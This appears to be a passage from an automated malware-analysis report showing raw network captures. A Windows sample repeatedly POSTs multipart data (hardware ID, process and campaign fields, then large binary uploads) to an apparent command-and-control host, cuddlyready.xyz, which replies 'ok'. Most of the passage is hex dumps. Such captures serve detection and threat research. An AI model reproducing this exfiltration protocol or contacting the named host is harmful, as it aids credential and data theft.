                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 7a 4c 44 78 76 42 50 37 66 31 43 64 75 65 5a 54 6c 7a 65 4b 5a 41 4d 75 76 2f 2f 43 38 42 79 42 42 44 68 4f 77 31 5a 35 31 6f 72 49 35 42 47 64 68 7a 35 62 49 69 36 6f 68 35 50 7a 42 63 74 6c 30 71 35 2b 48 68 4c 41 50 46 44 6b 65 55 6f 6e 73 6d 67 57 2f 39 67 46 6b 49 30 43 53 36 37 55 6e 51 33 32 67 35 4d 69 66 68 51 43 2f 75 34 50 77 6a 43 38 4d 51 53 59 48 6e 50 32 71 63 61 65 54 4a 43 78 76 46 4e 62 66 78 43 63 61 65 59 7a 46 37 63 61 67 4c 62 71 44 71 37 32 64 61 68 69 35 61 67 2f 6f 34 64 74 4a 61 37 39 45 51 43 38 30 6a 75 37 41 6f 79 70 4e 73 4d 48 56 76 34 56 52 75 2b 61 33 77 4b 30 4b 65 57 45 71 41 37 6a 5a 68 6e 6d 66 68 7a 77 59 56 7a 7a 6d 7a 34 41 6a 4d 6c 32 4d 39 66 32 32 72 51 54 4c 70 35 50 6f 70 43 74 51 62 43 73 71 69 4d 6e 37 51 4d
                                                                                                              Data Ascii: zLDxvBP7f1CdueZTlzeKZAMuv//C8ByBBDhOw1Z51orI5BGdhz5bIi6oh5PzBctl0q5+HhLAPFDkeUonsmgW/9gFkI0CS67UnQ32g5MifhQC/u4PwjC8MQSYHnP2qcaeTJCxvFNbfxCcaeYzF7cagLbqDq72dahi5ag/o4dtJa79EQC80ju7AoypNsMHVv4VRu+a3wK0KeWEqA7jZhnmfhzwYVzzmz4AjMl2M9f22rQTLp5PopCtQbCsqiMn7QM
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 63 38 53 57 77 34 67 54 4d 6d 46 45 4c 66 48 69 31 54 43 37 6d 37 62 64 70 51 73 6c 59 45 72 32 69 66 53 61 76 4a 71 7a 59 51 55 61 41 42 72 37 38 43 63 36 4a 66 6e 68 52 61 4c 64 42 4f 36 4c 4c 38 44 59 4c 30 42 56 59 78 4b 78 31 59 4e 41 77 76 49 35 42 47 74 46 7a 35 61 4a 56 6b 73 6f 38 59 69 49 74 76 67 55 35 6f 50 75 33 66 31 43 49 57 46 6a 45 75 6e 55 68 6b 33 72 2b 78 67 49 49 77 33 53 44 7a 43 66 43 69 57 34 34 65 58 4f 66 64 54 58 6a 34 2f 6b 67 46 4e 64 59 42 4d 54 74 64 54 36 70 4b 4b 53 41 50 6c 43 41 4b 2f 32 71 52 2f 79 63 59 54 74 31 61 62 41 47 41 4f 76 37 39 69 6f 4a 79 6c 70 4c 69 66 49 79 4a 74 34 6f 36 6f 42 5a 54 6f 35 7a 75 65 4e 48 6b 63 38 39 62 69 63 73 39 68 74 79 2f 36 50 75 5a 78 53 47 51 42 6a 4b 6f 69 63 6d 79 43 69 72 77 78
                                                                                                              Data Ascii: c8SWw4gTMmFELfHi1TC7m7bdpQslYEr2ifSavJqzYQUaABr78Cc6JfnhRaLdBO6LL8DYL0BVYxKx1YNAwvI5BGtFz5aJVkso8YiItvgU5oPu3f1CIWFjEunUhk3r+xgIIw3SDzCfCiW44eXOfdTXj4/kgFNdYBMTtdT6pKKSAPlCAK/2qR/ycYTt1abAGAOv79ioJylpLifIyJt4o6oBZTo5zueNHkc89bics9hty/6PuZxSGQBjKoicmyCirwx
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 72 50 45 48 77 74 38 68 64 58 51 2f 2b 52 6c 75 6f 4f 6e 6d 5a 31 71 57 53 68 48 52 73 57 49 32 77 6e 65 69 32 55 45 49 67 47 76 76 76 45 66 62 33 7a 64 31 4e 58 79 7a 57 53 62 6a 2b 2f 52 67 50 50 67 2b 53 59 50 6b 4e 6d 69 48 65 61 37 76 41 68 58 4d 50 37 72 6b 4f 66 65 4b 62 44 74 38 65 4c 64 61 59 4b 36 74 2b 47 64 61 2f 31 68 62 6a 75 56 35 4c 74 78 35 2f 38 34 4b 43 4d 64 7a 67 72 78 48 30 64 38 33 64 55 64 38 72 30 55 6e 39 76 79 36 41 51 48 42 48 6b 6d 4b 39 53 51 6d 33 69 6a 71 67 46 6c 4d 6a 6e 4f 35 34 30 65 52 7a 7a 31 75 4a 79 7a 32 47 33 4c 2f 6f 2b 35 6e 46 49 5a 41 47 63 71 69 4a 79 62 49 4b 4b 76 4f 44 42 2f 44 50 62 37 67 46 63 2b 63 65 54 59 31 51 5a 39 75 4c 65 33 6f 2b 53 41 38 2b 44 6c 41 6c 4f 38 36 59 61 35 57 32 39 45 47 44 6f 49
                                                                                                              Data Ascii: rPEHwt8hdXQ/+RluoOnmZ1qWShHRsWI2wnei2UEIgGvvvEfb3zd1NXyzWSbj+/RgPPg+SYPkNmiHea7vAhXMP7rkOfeKbDt8eLdaYK6t+Gda/1hbjuV5Ltx5/84KCMdzgrxH0d83dUd8r0Un9vy6AQHBHkmK9SQm3ijqgFlMjnO540eRzz1uJyz2G3L/o+5nFIZAGcqiJybIKKvODB/DPb7gFc+ceTY1QZ9uLe3o+SA8+DlAlO86Ya5W29EGDoI


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549706172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:12 UTC282OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=5JA9ZIPKI4NUP0SN8PW
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12847
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:12 UTC12847OUTData Raw: 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                              Data Ascii: --5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="pid"2--5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                              2024-12-23 07:35:13 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:13 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=pkkugrggaan3d1b12rg2rgmqt3; expires=Fri, 18 Apr 2025 01:21:52 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FW8g86%2FYuDb5GGVo0VgakhZv3LG7yfSFJ0XJ0cxq%2Bmnz1vn%2BN9n%2F9BDgMm7Apm1V5lgUrGqauuCfyGV1Hwjat93JIk0xTqsNQEifbHIlKVct37cW%2FBIBWSZJE3u6jsVTfS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac726b370ca8-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1507&rtt_var=578&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13787&delivery_rate=1874197&cwnd=159&unsent_bytes=0&cid=49c4db4fd4e92dd9&ts=1046&x=0"
                                                                                                              2024-12-23 07:35:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-23 07:35:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.549707172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:15 UTC271OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=HBCJQNWC
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15023
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:15 UTC15023OUTData Raw: 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                              Data Ascii: --HBCJQNWCContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--HBCJQNWCContent-Disposition: form-data; name="pid"2--HBCJQNWCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HBCJQNWCContent-Di
                                                                                                              2024-12-23 07:35:16 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:15 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=7ljjujo7ti1kfct6iuqmhtj6h7; expires=Fri, 18 Apr 2025 01:21:54 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ItREj7wuwFFX1PTMUkmFtlUS%2BsYeGve8p1ZhOF2Exir7oysYWCcWPoKBcHppn4HQzk%2BlAFXkyNWifXkxY%2F%2BYGh2IAulSVHUhGczj2%2FHn%2F3fbKJuv6NwEWkNXO40nCL%2Bpi8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac810e798c0c-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1801&rtt_var=700&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15952&delivery_rate=1536842&cwnd=206&unsent_bytes=0&cid=e75dff55cd351c49&ts=956&x=0"
                                                                                                              2024-12-23 07:35:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-23 07:35:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.549708172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:17 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=XIB13SBIMPZZOTJ
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20555
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:17 UTC15331OUTData Raw: 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 49 42 31 33 53 42 49 4d 50 5a 5a 4f 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                              Data Ascii: --XIB13SBIMPZZOTJContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--XIB13SBIMPZZOTJContent-Disposition: form-data; name="pid"3--XIB13SBIMPZZOTJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                              2024-12-23 07:35:17 UTC5224OUTData Raw: c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69
                                                                                                              Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
                                                                                                              2024-12-23 07:35:18 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:18 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=0cfbinre3k5ts9274bvvjnvk87; expires=Fri, 18 Apr 2025 01:21:57 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97QUWI0%2FETI4HSljldocsOU7pMnALQdBVle8GPWKPJBAEPK2%2BYCsJPpH0GM8R7HE6LqvvKt7%2FVpvECLX3iFOmIbWhXeWZniZu1l66%2Fs%2Fspb48AXMvfXFFflYLzIYFKFqlbY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac8fd94a7ce4-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1786&rtt_var=683&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21513&delivery_rate=1587819&cwnd=228&unsent_bytes=0&cid=e1a7ecffc066e9db&ts=969&x=0"
                                                                                                              2024-12-23 07:35:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-23 07:35:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.549709172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:20 UTC277OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=7QDMMQOYHL4WJ9T
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1243
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:20 UTC1243OUTData Raw: 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 51 44 4d 4d 51 4f 59 48 4c 34 57 4a 39 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                              Data Ascii: --7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="pid"1--7QDMMQOYHL4WJ9TContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                              2024-12-23 07:35:20 UTC1126INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:20 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hc7cbkdrvhka87561nim8m3cb1; expires=Fri, 18 Apr 2025 01:21:59 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hk3gHqoXXksBLf39KzIIh7VWWdDssklV234qocC7Pno3oRtJVeGo%2BgOIdeK%2B6PdhQCoCNXyRg2vgbvJ3rYiLtpYjGWG%2Bw2EhoYCLq6V80a47jhDHYKkZ02n7isnIAJe%2Fk7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66aca0fd5d183d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1502&rtt_var=566&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2156&delivery_rate=1928665&cwnd=252&unsent_bytes=0&cid=92bae555987d6414&ts=687&x=0"
                                                                                                              2024-12-23 07:35:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-23 07:35:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.549711172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:22 UTC280OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=8CDCBNTIAV9KNB81
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 570768
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 43 44 43 42 4e 54 49 41 56 39 4b 4e 42 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                              Data Ascii: --8CDCBNTIAV9KNB81Content-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--8CDCBNTIAV9KNB81Content-Disposition: form-data; name="pid"1--8CDCBNTIAV9KNB81Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 84 fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03 ea 82 b2 e1 df be
                                                                                                              Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: ff d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89 7a ad 54 ac 47 29
                                                                                                              Data Ascii: -Xv^Ewh1JF^\H*Qy6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|zTG)
